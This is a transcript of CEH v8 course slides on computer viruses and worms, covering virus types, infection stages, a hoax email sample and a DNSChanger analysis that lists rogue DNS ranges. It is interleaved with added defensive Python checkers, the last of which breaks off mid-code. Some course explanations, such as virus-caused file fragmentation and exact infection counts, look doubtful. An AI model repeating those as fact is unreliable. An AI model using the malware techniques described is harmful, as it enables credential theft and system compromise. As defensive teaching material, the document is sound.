CEH v8 Module 07: Viruses and Worms

Transcript

  • 1. Viruses and Worms Module 07
  • 2. Ethical Hacking and Countermeasures, Viruses and Worms, Exam 312-50 Certified Ethical Hacker. Viruses and Worms, Module 07. Engineered by Hackers. Presented by Professionals. Ethical Hacking and Countermeasures v8, Module 07: Viruses and Worms, Exam 312-50. Module 07 Page 1007. Ethical Hacking and Countermeasures Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.
  • 3. Security News: Global Cyber-Warfare Tactics: New Flame-linked Malware used in "Cyber-Espionage" (GlobalResearch, October 19, 2012)
    Source: http://www.globalresearch.ca
    A new cyber espionage program linked to the notorious Flame and Gauss malware has been detected by Russia's Kaspersky Lab. The antivirus giant's chief warns that global cyber warfare is in "full swing" and will probably escalate in 2013. The virus, dubbed miniFlame, and also known as SPE, has already infected computers in Iran, Lebanon, France, the United States, and Lithuania. It was discovered in July 2012 and is described as "a small and highly flexible malicious program designed to steal data and control infected systems during targeted cyber espionage operations," Kaspersky Lab said in a statement posted on its website. The malware was originally identified as an appendage of Flame, the program used for targeted cyber espionage in the Middle East and acknowledged to be part of joint US-Israeli efforts to undermine Iran's nuclear program.
  • 4. But later, Kaspersky Lab analysts discovered that miniFlame is an "interoperable tool that could be used as an independent malicious program, or concurrently as a plug-in for both the Flame and Gauss malware." The analysis also showed new evidence of cooperation between the creators of Flame and Gauss, as both viruses can use miniFlame for their operations. "MiniFlame's ability to be used as a plug-in by either Flame or Gauss clearly connects the collaboration between the development teams of both Flame and Gauss. Since the connection between Flame and Stuxnet/Duqu has already been revealed, it can be concluded that all these advanced threats come from the same 'cyber warfare' factory," Kaspersky Lab said.
    High-precision attack tool
    So far just 50 to 60 cases of infection have been detected worldwide, according to Kaspersky Lab. But unlike Flame and Gauss, miniFlame is meant for installation on machines already infected by those viruses. "MiniFlame is a high-precision attack tool. Most likely it is a targeted cyber weapon used in what can be defined as the second wave of a cyber attack," Kaspersky's Chief Security Expert Alexander Gostev explained.
    "First, Flame or Gauss are used to infect as many victims as possible to collect large quantities of information. After data is collected and reviewed, a potentially interesting victim is defined and identified, and miniFlame is installed in order to conduct more in-depth surveillance and cyber-espionage." The newly-discovered malware can also take screenshots of an infected computer while it is running a specific program or application such as a web browser, Microsoft Office program, Adobe Reader, instant messenger service or FTP client. Kaspersky Lab believes miniFlame's developers have probably created dozens of different modifications of the program. "At this time, we have only found six of these, dated 2010-2011," the firm said.
    'Cyber warfare in full swing'
    Meanwhile, Kaspersky Lab's co-founder and CEO Eugene Kaspersky warned that global cyber warfare tactics are becoming more sophisticated while also becoming more threatening. He urged governments to work together to fight cyber warfare and cyber-terrorism, Xinhua news agency reports. Speaking at an International Telecommunication Union Telecom World conference in Dubai, the antivirus tycoon said, "cyber warfare is in full swing and we expect it to escalate in 2013."
" T h e la t e s t m a lic io u s v ir u s a t t a c k o n t h e w o r l d ' s la r g e s t o il a n d gas c o m p a n y , Saudi A r a m c o , last A u g u s t s h o w s h o w d e p e n d e n t w e a re t o d a y o n t h e I n t e r n e t a nd i n f o r m a t i o n t e c h n o l o g y in g e n e r a l, a n d h o w v u ln e r a b l e w e a r e ," K a sp e rs ky said. He s t o p p e d s h o r t o f b la m i n g a n y p a r t i c u l a r p la y e r b e h in d t h e m a s s iv e c y b e r - a t t a c k s across t h e M i d d l e East, p o i n t i n g o u t t h a t " o u r j o b is n o t t o i d e n t i t y h a c k e rs o r c y b e r - t e r r o r i s t s . O u r f i r m is M odule 07 Page 1009 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 5. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker like an X -ra y m a c h in e , m e a n i n g w e can scan a n d i d e n t i f y a p r o b l e m , b u t w e c a n n o t say w h o o r w h a t is b e h in d i t . " Iran, w h o c o n f i r m e d t h a t it s u f f e r e d an a t t a c k b y F la m e m a l w a r e t h a t ca u s e d s e v e re d a ta loss, b la m e s t h e U n i t e d S ta te s a nd Israel f o r u n l e a s h i n g t h e c y b e r - a tta c k s . C o p y r i g h t © 2 0 0 5 - 2 0 1 2 G lo b a lR e s e a r c h .c a B y R u s s ia T o d a y http://www.globalresearch.ca/global-cyber-warfare-tactics-new-flame-linked-malware-used-incyber-espionage/5308867 M odule 07 Page 1010 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 6. Module Objectives
    The objective of this module is to expose you to the various viruses and worms available today. It gives you information about all the available viruses and worms. This module examines the workings of a computer virus, its function, classification, and the manner in which it affects systems. This module will go into detail about the various countermeasures available to protect against these virus infections. The main objective of this module is to educate you about the available viruses and worms, indications of their attack and the ways to protect against various viruses, and testing your system or network for the presence of viruses or worms.
    This module will familiarize you with:
      - Introduction to Viruses
      - Stages of Virus Life
      - Working of Viruses
      - Indications of Virus Attack
      - How Does a Computer Get Infected by Viruses?
      - Virus Analysis
      - Types of Viruses
      - Virus Maker
      - Computer Worms
      - Worm Analysis
      - Worm Maker
      - Malware Analysis Procedure
      - Online Malware Analysis Services
      - Virus and Worms Countermeasures
      - Antivirus Tools
      - Penetration Testing for Virus
  • 7. Module Flow: Virus and Worms Concepts; Types of Viruses; Computer Worms; Malware Analysis; Countermeasures; Penetration Testing.
    This section introduces you to the various viruses and worms available today and gives you a brief overview of each virus and statistics of viruses and worms in recent years. It lists various types of viruses and their effects on your system. The working of viruses in each phase will be discussed in detail. The techniques used by the attacker to distribute malware on the web are highlighted.
  • 8. Introduction to Viruses
    A virus is a self-replicating program that produces its own copy by attaching itself to another program, computer boot sector or document. Viruses are generally transmitted through file downloads, infected disk/flash drives and as email attachments.
    Virus characteristics: alters data; infects other programs; corrupts files and programs; transforms itself; encrypts itself; self-propagates.
    Computer viruses have the potential to wreak havoc on both business and personal computers. Worldwide, most businesses have been infected at some point. A virus is a self-replicating program that produces its own code by attaching copies of itself to other executable code. This virus operates without the knowledge or desire of the user. Like a real virus, a computer virus is contagious and can contaminate other files. However, viruses can infect outside machines only with the assistance of computer users. Some viruses affect computers as soon as their code is executed; other viruses lie dormant until a pre-determined logical circumstance is met.
    There are three categories of malicious programs:
      - Trojans and rootkits
      - Viruses
      - Worms
    A worm is a malicious program that can infect both local and remote machines. Worms spread automatically by infecting system after system in a network, and even spreading further to other networks. Therefore, worms have a greater potential for causing damage because they do not rely on the user's actions for execution. There are also malicious programs in the wild that contain all of the features of these three malicious programs.
  • 9. Virus and Worm Statistics
    Source: http://www.av-test.org
    [Bar chart: systems affected by viruses and worms per year, 2008 to 2012, vertical axis 0 to 75,000,000]
    This graphical representation gives detailed information about the attacks that have occurred in recent years. According to the graph, only 11,666,667 systems were affected by viruses and worms in the year 2008, whereas in the year 2012 the count drastically increased to 70,000,000 systems, which means that the growth of malware attacks on systems is increasing exponentially year by year.
  • 10. FIGURE 7.1: Virus and Worm Statistics (bar chart, years 2008 to 2012, vertical axis 0 to 75,000,000)
  • 11. Stages of Virus Life
    Computer virus attacks spread through various stages from inception to design to elimination.
    1. Design: A virus code is developed by using programming languages or construction kits. Anyone with basic programming knowledge can create a virus.
    2. Replication: A virus first replicates itself within a target system over a period of time and then spreads itself.
    3. Launch: It is activated when a user performs certain actions such as triggering or running an infected program.
    4. Detection: A virus is identified as a threat infecting target systems. Its actions cause considerable damage to the target system's data.
  • 12. 5. Incorporation: Antivirus software developers assemble defenses against the virus.
    6. Elimination: Users are advised to install antivirus software updates, thus eliminating the virus threat and creating awareness among user groups.
  • 13. Working of Viruses: Infection Phase
    In the infection phase, the virus replicates itself and attaches to an .exe file in the system. (Before infection: clean file. After infection: virus-infected file.)
    Viruses attack a target host's system by using various methods. They attach themselves to programs and transmit themselves to other programs by making use of certain events. Viruses need such events to take place since they cannot:
      - Self start
      - Infect other hardware
      - Cause physical damage to a computer
      - Transmit themselves using non-executable files
    Generally viruses have two phases, the infection phase and the attack phase. In the infection phase, the virus replicates itself and attaches to an .exe file in the system. Programs modified by a virus infection can enable virus functionalities to run on that system. Viruses get enabled as soon as the infected program is executed, since the program code leads to the virus code. Virus writers have to maintain a balance among factors such as:
      - How will the virus infect?
      - How will it spread?
      - How will it reside in a target computer's memory without being detected?
  • 14. Obviously, viruses have to be triggered and executed in order to function. There are many ways to execute programs while a computer is running. For example, any setup program calls for numerous programs that may be built into a system, and some of these are distribution medium programs. Thus, if a virus program already exists, it can be activated with this kind of execution and infect the additional setup program as well. There are virus programs that infect and keep spreading every time they are executed. Some programs do not infect the programs when first executed. They reside in a computer's memory and infect programs at a later time. Such virus programs as TSR wait for a specified trigger event to spread at a later stage. It is, therefore, difficult to recognize which event might trigger the execution of a dormant virus infection.
    Refer to the figure that follows to see how the EXE file infection works. In the following figure, the .EXE file's header, when triggered, executes and starts running the application. Once this file is infected, any trigger event from the file's header can activate the virus code too, along with the application program as soon as it is run.
      - A file virus infects by attaching itself to an executable system application program. Text files such as source code, batch files, script files, etc., are considered potential targets for virus infections.
      - Boot sector viruses execute their own code in the first place before the target PC is booted.
    FIGURE 7.2: Working of Viruses in Infection Phase (before infection: clean .exe file; after infection: virus-infected file)
  • 15. Working of Viruses: Attack Phase
    Viruses are programmed with trigger events to activate and corrupt systems. Some viruses infect each time they are run and others infect only when a certain predefined condition is met such as a user's specific task, a day, time, or a particular event. (Diagram: unfragmented file before attack versus file fragmented due to virus attack; see Figure 7.3.)
    Once viruses spread themselves throughout the target system, they start corrupting the files and programs of the host system. Some viruses have trigger events that need to be activated to corrupt the host system. Some viruses have bugs that replicate themselves, and perform activities such as deleting files and increasing session time. They corrupt their targets only after spreading as intended by their developers. Most viruses that attack target systems perform actions such as:
      - Deleting files and altering content in data files, thereby causing the system to slow down
      - Performing tasks not related to applications, such as playing music and creating animations
  • 16. FIGURE 7.3: Working of Viruses in Attack Phase. Unfragmented file before attack: File A pages 1, 2, 3 followed by File B pages 1, 2, 3. File fragmented due to virus attack: A page 1, B page 3, B page 1, A page 3, B page 2, A page 2.
    Refer to this figure, which has two files, A and B. In section one, the two files are located one after the other in an orderly fashion. Once a virus code infects the file, it alters the positioning of the files that were consecutively placed, thus leading to inaccuracy in file allocations, causing the system to slow down as users try to retrieve their files. In this phase:
      - Viruses execute when some events are triggered
      - Some execute and corrupt via built-in bug programs after being stored in the host's memory
      - Most viruses are written to conceal their presence, attacking only after spreading in the host to the fullest extent
  • 17. Why Do People Create Computer Viruses?
    Source: http://www.securitydocs.com
    Computer viruses are not self-generated, but are created by cyber-criminal minds, intentionally designed to cause destructive occurrences in a system. Generally, viruses are created with a disreputable motive. Cyber-criminals create viruses to destroy a company's data, as an act of vandalism or a prank, or to destroy a company's products. However, in some cases, viruses are actually intended to be good for a system. These are designed to improve a system's performance by deleting previously embedded viruses from files. Some reasons viruses have been written include:
      - Inflict damage to competitors
      - Research projects
      - Pranks
      - Vandalism
      - Attack the products of specific companies
      - Distribute political messages
      - Financial gain
  • 18. (continued)
      - Identity theft
      - Spyware
      - Cryptoviral extortion
  • 19. Indications of Virus Attacks
    Processes take more resources and time; the computer slows down when programs start; the computer freezes frequently or encounters errors.
    An effective virus tends to multiply rapidly and may infect a number of machines within three to five days. Viruses can infect Word files which, when transferred, can infect the machines of the users who receive them. A virus can also make good use of file servers in order to infect files. The following are indications of a virus attack on a computer system:
      - Programs take longer to load
      - The hard drive is always full, even without installing any programs
      - The floppy disk drive or hard drive runs when it is not being used
      - Unknown files keep appearing on the system
      - The keyboard or the computer emits strange or beeping sounds
      - The computer monitor displays strange graphics
      - File names turn strange, often beyond recognition
      - The hard drive becomes inaccessible when trying to boot from the floppy drive
      - A program's size keeps changing
      - The memory on the system seems to be in use and the system slows down
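The infection-phase slides describe a virus attaching itself to a clean .exe (Figure 7.2), and the indications list above includes unknown files appearing and a program's size changing. As an added example, not part of the CEH material, the following Python script baselines the size and SHA-256 of executables under a directory and later reports which ones were modified, grew, appeared or vanished; the directory tree, file names and contents are constructed fixtures, and the suffix list is an assumption.

```python
import hashlib
import tempfile
from pathlib import Path

# File types a file-infecting virus typically attaches to (assumed list for this example).
EXECUTABLE_SUFFIXES = {".exe", ".dll", ".com", ".scr", ".sys"}


def file_fingerprint(path: Path) -> dict:
    """Return the size and SHA-256 digest of one file, hashed in 64 KiB chunks."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return {"size": path.stat().st_size, "sha256": digest.hexdigest()}


def build_baseline(root: Path) -> dict:
    """Fingerprint every executable under root, keyed by relative path (the 'before' state)."""
    baseline = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in EXECUTABLE_SUFFIXES:
            baseline[str(path.relative_to(root))] = file_fingerprint(path)
    return baseline


def compare_to_baseline(root: Path, baseline: dict) -> dict:
    """Re-scan root and classify each executable against the stored baseline.

    modified: content hash differs from the baseline (the program was altered)
    grown:    (path, old_size, new_size) for modified files that got bigger, the
              pattern a file virus leaves when it appends itself to a host .exe
    new:      executables that were not present when the baseline was taken
    missing:  baseline executables that are gone
    """
    current = build_baseline(root)
    findings = {"modified": [], "grown": [], "new": [], "missing": []}
    for rel, fp in current.items():
        old = baseline.get(rel)
        if old is None:
            findings["new"].append(rel)
        elif fp["sha256"] != old["sha256"]:
            findings["modified"].append(rel)
            if fp["size"] > old["size"]:
                findings["grown"].append((rel, old["size"], fp["size"]))
    findings["missing"] = [rel for rel in baseline if rel not in current]
    return findings


def demo() -> dict:
    """Build a constructed 'before' tree, baseline it, apply constructed 'after' changes, diff."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        # Constructed stand-ins for programs; "MZ" is only the DOS executable magic, nothing runs.
        (root / "app.exe").write_bytes(b"MZ" + b"\x00" * 100 + b"original program body")
        (root / "tool.exe").write_bytes(b"MZ" + b"\x00" * 50 + b"unchanged")
        (root / "notes.txt").write_bytes(b"not an executable, ignored by the scan")
        baseline = build_baseline(root)

        # Constructed "after infection" state: one program grew because extra bytes
        # were appended to it (the Figure 7.2 pattern) and an unknown executable appeared.
        with (root / "app.exe").open("ab") as fh:
            fh.write(b"APPENDED-SEGMENT")
        (root / "unknown.exe").write_bytes(b"MZ" + b"?" * 10)

        return compare_to_baseline(root, baseline)


if __name__ == "__main__":
    for kind, items in demo().items():
        print(f"{kind}: {items}")
```

In practice the baseline is taken from known-clean media and stored off-host, since a baseline kept on the scanned machine can be rewritten along with the programs it covers.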
  • 20. How Does a Computer Get Infected by Viruses?
    Slide points: accepting files and downloads without properly checking the source; opening infected e-mail attachments; installing pirated software; not updating and not installing new versions of plug-ins; not running the latest anti-virus application.
    There are many ways in which a computer gets infected by viruses. The most popular methods are as follows:
    - When a user accepts files and downloads without properly checking the source.
    - Attackers usually send virus-infected files as email attachments to spread the virus to the victim's system. If the victim opens the mail, the virus automatically infects the system.
    - Attackers incorporate viruses in popular software programs and upload the infected software to websites intended for downloading software. When the victim downloads the infected software and installs it, the system gets infected.
    - Failing to install new versions or to update with the latest patches intended to fix known bugs may expose your system to viruses.
    - As technology advances, attackers also design new viruses. Failing to use the latest antivirus applications may expose you to virus attacks.
  • 21. Common Techniques Used to Distribute Malware on the Web
    Source: Security Threat Report 2012 (http://www.sophos.com)
    - Blackhat Search Engine Optimization (SEO): Using this technique, the attacker ranks malware pages highly in search results
    - Social Engineered Click-jacking: Attackers trick users into clicking on innocent-looking web pages that contain malware
    - Spearphishing Sites: This technique mimics legitimate institutions, such as banks, in an attempt to steal account login credentials
    - Malvertising: Embeds malware in ad networks that display across hundreds of legitimate, high-traffic sites
    - Compromised Legitimate Websites: Hosting embedded malware that spreads to unsuspecting visitors
    - Drive-by Downloads: The attacker exploits flaws in browser software to install malware just by visiting a web page
  • 22. Virus Hoaxes and Fake Antiviruses
    Slide points: Attackers disguise malware as an antivirus and trick users into installing it on their systems; once installed, these fake antiviruses can damage target systems like any other malware. Hoaxes are false alarms claiming reports about a non-existent virus, and may themselves contain virus attachments; warning messages propagate claiming that a certain email message should not be viewed and that doing so will damage one's system. (The slide reproduces the hoax email shown in Figure 7.3.)
    Virus Hoaxes
    A virus hoax is simply a bluff. Viruses, by their nature, have always created a horrifying impression. Hoaxes are typically untrue scare alerts that unscrupulous individuals send to create havoc. It is fairly common for innocent users to pass these phony messages along thinking they are helping others avoid the "virus."
    - Hoaxes are false alarms claiming reports about non-existing viruses
    - These warning messages, which can be propagated rapidly, state that a certain email message should not be opened, and that doing so would damage one's system
    - In some cases, these warning messages themselves contain virus attachments
    - These possess the capability of vast destruction on target systems
    Many hoaxes try to "sell" things that are technically nonsense. Nevertheless, the hoaxer has to be somewhat of an expert to spread hoaxes in order to avoid being identified and caught. Therefore, it is a good practice to look for technical details about how one would become infected. Also search for information in the wild to learn more about the hoax, especially by scanning bulletin boards where people actively discuss current happenings in the community.
  • 23. Try to cross-check the identity of the person who has posted the warning. Also look for more information about the hoax/warning from secondary sources. Before jumping to conclusions by reading certain documents on the Internet, check the following:
    - If it is posted by newsgroups that are suspicious, cross-check the information with another source
    - If the person who has posted the news is not a known person in the community or an expert, cross-check the information with another source
    - If a government body has posted the news, the posting should also have a reference to the corresponding federal regulation
    - One of the most effective checks is to look up the suspected hoax virus by name on antivirus software vendor sites
    - If the posting is technical, hunt for sites that would cater to the technicalities, and try to authenticate the information

    Subject: FORWARD THIS WARNING AMONG FRIENDS, FAMILY AND CONTACTS
    PLEASE FORWARD THIS WARNING AMONG FRIENDS, FAMILY AND CONTACTS!
    You should be alert during the next few days. Do not open any message with an attachment entitled 'POSTCARD FROM BEJING' or 'RESIGNATION OF BARACK OBAMA', regardless of who sent it to you. It is a virus that opens A POSTCARD IMAGE, then 'burns' the whole hard C disc of your computer. This is the worst virus announced by CNN last evening. It has been classified by Microsoft as the most destructive virus ever. The virus was discovered by McAfee yesterday, and there is no repair yet for this kind of virus. This virus simply destroys the Zero Sector of the Hard Disc, where the vital information is kept. COPY THIS E MAIL, AND SEND IT TO YOUR FRIENDS. REMEMBER: IF YOU SEND IT TO THEM, YOU WILL BENEFIT ALL OF US.
    End-of-mail
    Thanks.
    FIGURE 7.3: Hoaxes Warning Message

    Fake Antiviruses
    A fake antivirus is a method hackers use to compromise a system: it can poison your system and corrupt the registry and system files to allow the attacker to take full control of and access to your computer. It appears and performs similarly to a real antivirus program. Fake antivirus programs first appear in different browsers and warn users that they have various security threats on their system, and this message is backed up by real suspicious viruses. When the user tries to remove the viruses, they are navigated to another page where they need to buy or subscribe to that antivirus and proceed to enter payment details. These fake antivirus programs have been fabricated in such a way that they draw the attention of the unsuspecting user into installing the software.
    Some of the methods used to extend the usage and installation of fake antivirus programs include:
    - Email and messaging: Attackers use spam email and social networking messages to spread this type of infected email to users and prompt the user to open the attachments for software installation.
  • 24.
    - Search engine optimization: Attackers generate pages related to popular or current search terms and plant them so that they appear as extraordinary and the latest in search engine results. The web pages show alerts about infection that encourage the user to buy the fake antivirus.
    - Compromised websites: Attackers secretly break into popular sites to install the fake antiviruses, which can be used to entice users to download the fake antivirus by relying on the site's popularity.
    FIGURE 7.4: Example of a Fake Antivirus
  • 25. Virus Analysis: DNSChanger
    Source: http://www.totaldefense.com
    Slide points: DNSChanger (Alureon) modifies the DNS settings on the victim PC to divert Internet traffic to malicious websites in order to generate fraudulent ad revenue, sell fake services, or steal personal financial information. It acts as a bot and can be organized into a botnet and controlled from a remote location. It spreads through emails, social engineering tricks, and untrusted downloads from the Internet. DNSChanger achieves the DNS redirection by modifying the following registry key settings against an interface device such as a network card:
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\%Random CLSID%\NameServer
    DNSChanger (Alureon) is malware that spreads through emails, social engineering tricks, and untrusted downloads from the Internet. It acts as a bot and can be organized into a botnet and controlled from a remote location. This malware achieves DNS redirection by modifying the system registry key settings against an interface device such as a network card. DNSChanger has received significant attention due to the large number of affected systems worldwide and the fact that, as part of the botnet takedown, the FBI took ownership of the rogue DNS servers to ensure those affected did not immediately lose the ability to resolve DNS names. It can also modify the DNS settings on the victim's PC to divert Internet traffic to malicious websites in order to generate fraudulent ad revenue, sell fake services, or steal personal financial information.
  • 26. Virus Analysis: DNSChanger (Cont'd)
    Source: http://www.totaldefense.com
    The rogue DNS servers can exist in any of the following ranges:
    64.28.176.0 - 64.28.191.255, 67.210.0.0 - 67.210.15.255
    77.67.83.0 - 77.67.83.255, 93.188.160.0 - 93.188.167.255
    85.255.112.0 - 85.255.127.255, 213.109.64.0 - 213.109.79.255
    (The slide also carries the diagram shown as Figure 7.5.)
  • 27. FIGURE 7.5: Virus Analysis Using DNSChanger
    Figure labels: victim asks "What is the IP address of www.xsecurity.com?"; the DNS request goes to 64.28.176.2; DNSChanger infects the victim's computer by changing her DNS IP address to 64.28.176.2; the attacker runs a DNS server in Russia (IP: 64.28.176.2); fake website, IP: 65.0.0.2; DNSChanger sniffs the credentials and redirects the request to the real website www.xsecurity.com, IP: 200.0.0.45.
    To infect the system and steal credentials, the attacker first has to run a DNS server. Here the attacker runs his or her DNS server in Russia with an IP of, say, 64.28.176.2. Next, the attacker infects the victim's computer by changing his or her DNS IP address to 64.28.176.2. When this malware has infected the system, it entirely changes the DNS settings of the infected machine and forces all DNS requests to go to the DNS server run by the attacker. After altering the DNS setting, any request that is made by the system is sent to the malicious DNS server. Here, the victim sent the DNS request "what is the IP address of www.xsecurity.com" to 64.28.176.2. The attacker answered the request with www.xsecurity.com located at 65.0.0.2. When the victim's browser connects to 65.0.0.2, it lands on a fake website created by the attacker with IP 65.0.0.2. DNSChanger sniffs the credentials (user name, passwords) and redirects the request to the real website (www.xsecurity.com) with IP 200.0.0.45.
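    The defensive check that follows from the two DNSChanger slides is to compare each interface's configured resolver against the published rogue ranges. This is an added example written for this transcript, not code from the module or from totaldefense.com. The rogue ranges and the `Interfaces\{GUID}\NameServer` registry location come from the slides; the sample registry values are constructed, and the `read_interfaces_from_registry` helper uses the standard `winreg` module and is only meaningful on Windows (it returns an empty dict elsewhere, so the script still runs offline on the constructed sample).

```python
import ipaddress

# Rogue DNS server ranges listed on the DNSChanger slide.
ROGUE_DNS_RANGES = [
    ("64.28.176.0", "64.28.191.255"),
    ("67.210.0.0", "67.210.15.255"),
    ("77.67.83.0", "77.67.83.255"),
    ("93.188.160.0", "93.188.167.255"),
    ("85.255.112.0", "85.255.127.255"),
    ("213.109.64.0", "213.109.79.255"),
]

# Expand each first-last pair into CIDR networks once, for fast membership tests.
ROGUE_NETWORKS = [
    net
    for first, last in ROGUE_DNS_RANGES
    for net in ipaddress.summarize_address_range(
        ipaddress.IPv4Address(first), ipaddress.IPv4Address(last)
    )
]

# Registry key DNSChanger modifies; each interface GUID is a subkey holding
# a NameServer value.
INTERFACES_KEY = r"SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces"


def is_rogue_dns(ip: str) -> bool:
    """True if the resolver address falls inside one of the DNSChanger ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in ROGUE_NETWORKS)


def parse_nameserver_value(value: str) -> list:
    """NameServer is a REG_SZ holding a comma- or space-separated resolver list."""
    return [tok for tok in value.replace(",", " ").split() if tok]


def check_interfaces(interfaces: dict) -> list:
    """interfaces maps interface GUID -> NameServer string.

    Returns (guid, ip) pairs whose statically configured resolver is rogue.
    Malformed tokens are skipped rather than failing the whole scan.
    """
    findings = []
    for guid, value in interfaces.items():
        for ip in parse_nameserver_value(value):
            try:
                if is_rogue_dns(ip):
                    findings.append((guid, ip))
            except ValueError:
                continue
    return findings


def read_interfaces_from_registry() -> dict:
    """Windows-only helper: collect NameServer values for every interface GUID.

    Uses the standard winreg module; on other platforms returns an empty dict.
    """
    try:
        import winreg
    except ImportError:
        return {}
    result = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, INTERFACES_KEY) as root:
        index = 0
        while True:
            try:
                guid = winreg.EnumKey(root, index)
            except OSError:
                break
            index += 1
            with winreg.OpenKey(root, guid) as sub:
                try:
                    value, _ = winreg.QueryValueEx(sub, "NameServer")
                except OSError:
                    continue
                if value:
                    result[guid] = value
    return result


# Constructed sample registry data (not taken from a real machine): the second
# interface points at resolvers inside two of the listed rogue ranges.
SAMPLE_INTERFACES = {
    "{11111111-2222-3333-4444-555555555555}": "8.8.8.8,8.8.4.4",
    "{66666666-7777-8888-9999-000000000000}": "64.28.176.2 85.255.112.10",
}

if __name__ == "__main__":
    live = read_interfaces_from_registry()
    for guid, ip in check_interfaces(live or SAMPLE_INTERFACES):
        print(f"{guid}: NameServer {ip} is inside a DNSChanger rogue range")
```

    Only statically configured resolvers show up under `NameServer`; DHCP-assigned ones live in `DhcpNameServer`, so a thorough check of a suspect host should read that value too and compare it the same way.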
  • 28. Module Flow
    Prior to this, we discussed virus and worm concepts. Now we will discuss the different types of viruses.
    Module flow: Virus and Worms Concepts; Types of Viruses; Computer Worms; Malware Analysis; Countermeasures; Penetration Testing.
    This section describes the different types of viruses.
  • 29. Types of Viruses
    Slide: System or Boot Sector Viruses; Stealth Virus/Tunneling Virus; Cluster Viruses; Encryption; Polymorphic; Metamorphic; Sparse Infector Virus; Direct Action or Transient; Multipartite.
    So far, we have discussed various virus and worm concepts. Now we will discuss various types of viruses. This section highlights various types of viruses and worms such as file and multipartite viruses, macro viruses, cluster viruses, stealth/tunneling viruses, encryption viruses, metamorphic viruses, shell viruses, and so on. Computer viruses are malicious software programs written by attackers to intentionally enter the targeted system without the user's permission. As a result, they affect the security and performance of the machine. A few of the most common types of computer viruses that adversely affect security systems are discussed in detail on the following slides.
    Viruses are classified depending on two categories:
    - What do they infect?
    - How do they infect?
  • 30. What Do They Infect?
    System or Boot Sector Viruses
    The most common targets for a virus are the system sectors, which are nothing but the Master Boot Record and the DOS Boot Record system sectors. These are the areas on the disk that are executed when the PC is booted. Every disk has a system sector of some sort. They specially infect the floppy boot sectors and records of the hard disk. For example: Disk Killer and Stone virus.
    File Viruses
    Executable files are infected by file viruses, as they insert their code into the original file and get executed. File viruses are larger in number, but they are not the most commonly found. They infect in a variety of ways and can be found in a large number of file types.
    Multipartite Virus
    They infect program files, and this file in turn affects the boot sectors; examples are Invader, Flip, and Tequila.
    Cluster Viruses
    Cluster viruses infect files without changing the file or planting extra files; they change the DOS directory information so that entries point to the virus code instead of the actual program.
    Macro Virus
    Microsoft Word or a similar application can be infected through a computer virus called a macro virus, which automatically performs a sequence of actions when the application is triggered or something else happens. Macro viruses are somewhat less harmful than other types. They are usually spread via email.
    How Do They Infect?
    Stealth Viruses
    These viruses try to hide themselves from antivirus programs by actively altering and corrupting the chosen service call interrupts when they are being run. Requests to perform operations with respect to these service call interrupts are replaced by virus code. These viruses state false information to hide their presence from antivirus programs. For example, the stealth virus hides the operations that it modified and gives false representations. Thus, it takes over portions of the target system and hides its virus code.
    Tunneling Viruses
    These viruses trace the steps of interceptor programs that monitor operating system requests so that they get into BIOS and DOS to install themselves. To perform this activity, they even tunnel under antivirus software programs.
  • 31. Encryption Viruses
    This type of virus consists of an encrypted copy of the virus and a decryption module. The decrypting module remains constant, whereas different keys are used for encryption.
    Polymorphic Viruses
    These viruses were developed to confuse antivirus programs that scan for viruses in the system. It is difficult to trace them, since they change their characteristics each time they infect, i.e., every copy of this virus differs from its previous one. Virus developers have even created metamorphic engines and virus writing toolkits that make the code of an existing virus look different from others of its kind.
    Metamorphic Viruses
    Code that can reprogram itself is called metamorphic code. This code is translated into temporary code, and then converted back to the normal code. This technique, in which the original algorithm remains intact, is used to avoid pattern recognition by antivirus software. This is more effective in comparison to polymorphic code. This type of virus consists of complex, extensive code.
    Overwriting File or Cavity Viruses
    Some program files have areas of empty space. This empty space is the main target of these viruses. The cavity virus, also known as the space filler virus, stores its code in this empty space. The virus installs itself in this unoccupied space without any destruction to the original code. It installs itself in the file it attempts to infect.
    Sparse Infector Viruses
    A sparse infector virus infects only occasionally (e.g., every tenth program executed) or only files whose lengths fall within a narrow range.
    Companion Viruses
    The companion virus stores itself by having the identical file name as the targeted program file. As soon as that file is executed, the virus infects the computer, and hard disk data is modified.
    Camouflage Viruses
    They disguise themselves as genuine applications of the user. These viruses are not difficult to find since antivirus programs have advanced to the point where such viruses are easily traced.
    Shell Viruses
    This virus code forms a layer around the target host program's code that can be compared to an "eggshell," making itself the original program and the host code its subroutine. Here, the original code is moved to a new location by the virus code and the virus assumes its identity.
  • 32. File Extension Viruses
    File extension viruses change the extensions of files; .TXT is safe, as it indicates a pure text file. If your computer's file extensions view is turned off and someone sends you a file named BAD.TXT.VBS, you will see only BAD.TXT.
    Add-on Viruses
    Most viruses are add-on viruses. This type of virus appends its code to the beginning of the host code without making any changes to the latter. Thus, the virus corrupts the startup information of the host code and places itself in its place, but it does not touch the host code. However, the virus code is executed before the host code. The only indication that the file is corrupted is that the size of the file has increased.
    Intrusive Viruses
    This form of virus overwrites its code either by completely removing the target host's program code, or sometimes it only overwrites part of it. Therefore, the original code is not executed properly.
    Direct Action or Transient Viruses
    Transfers all control to the host code where it resides, selects the target program to be modified, and corrupts it.
    Terminate and Stay Resident Viruses (TSRs)
    A TSR virus remains permanently in memory during the entire work session, even after the target host program is executed and terminated. It can be removed only by rebooting the system.
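    The BAD.TXT.VBS case in the file extension virus description is a double-extension trick, and a mail gateway or attachment reviewer can flag it mechanically. The following is an added example, not code from the module: it reconstructs what Explorer would display with extensions hidden, flags names whose real (last) extension is executable while the one before it looks like a document, and also handles the space-padded variant ("photo.jpg        .scr"), which goes beyond the slide's single example. The extension sets and the sample attachment names are assumptions constructed for the demo.

```python
import os

# Extensions Windows hands to a program or script interpreter on double-click.
# Not exhaustive; extend for the environment being reviewed.
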